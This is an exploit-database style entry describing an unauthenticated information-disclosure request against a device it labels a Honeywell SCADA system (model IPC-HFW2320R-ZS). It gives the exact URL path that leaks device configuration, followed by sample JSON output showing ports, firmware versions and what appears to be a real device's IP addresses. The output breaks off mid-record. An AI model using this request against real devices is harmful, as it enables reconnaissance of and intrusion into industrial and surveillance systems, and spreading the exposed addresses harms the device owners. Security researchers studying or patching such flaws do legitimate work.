# Exploit Title: Honeywell Scada System - Information Disclosure
# Date: 2018-05-23
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.honeywell.com
# Version: WebVersion : 3.2.1.294365 - DeviceType : IPC-HFW2320R-ZS
# Tested on: Linux
# To be written after the destination IP address /web_caps/webCapsConfig
# the downloaded file opens with the file name. The file contains
# critical information about the destination address
https://TargetIp/web_caps/webCapsConfig
# Result:
"Anonymous" : false,
   "DeviceSubClass" : "Unknown",
   "HttpPort" : {
      "InnerPort" : 80
   },
   "HttpsPort" : {
      "InnerPort" : 443
   },
   "NAS_Protocol_Mask" : 100,
   "PluginVersion" : "3.3.37.274972",
   "TCPPort" : 37777,
   "WebVersion" : "3.2.1.294365",
   "deviceType" : "IPC-HFW2320R-ZS",
   "eth0" : {
      "IPAddress" : "36.67.33.226",
      "IPv6Address" : "2001:250:3000:1::1:2"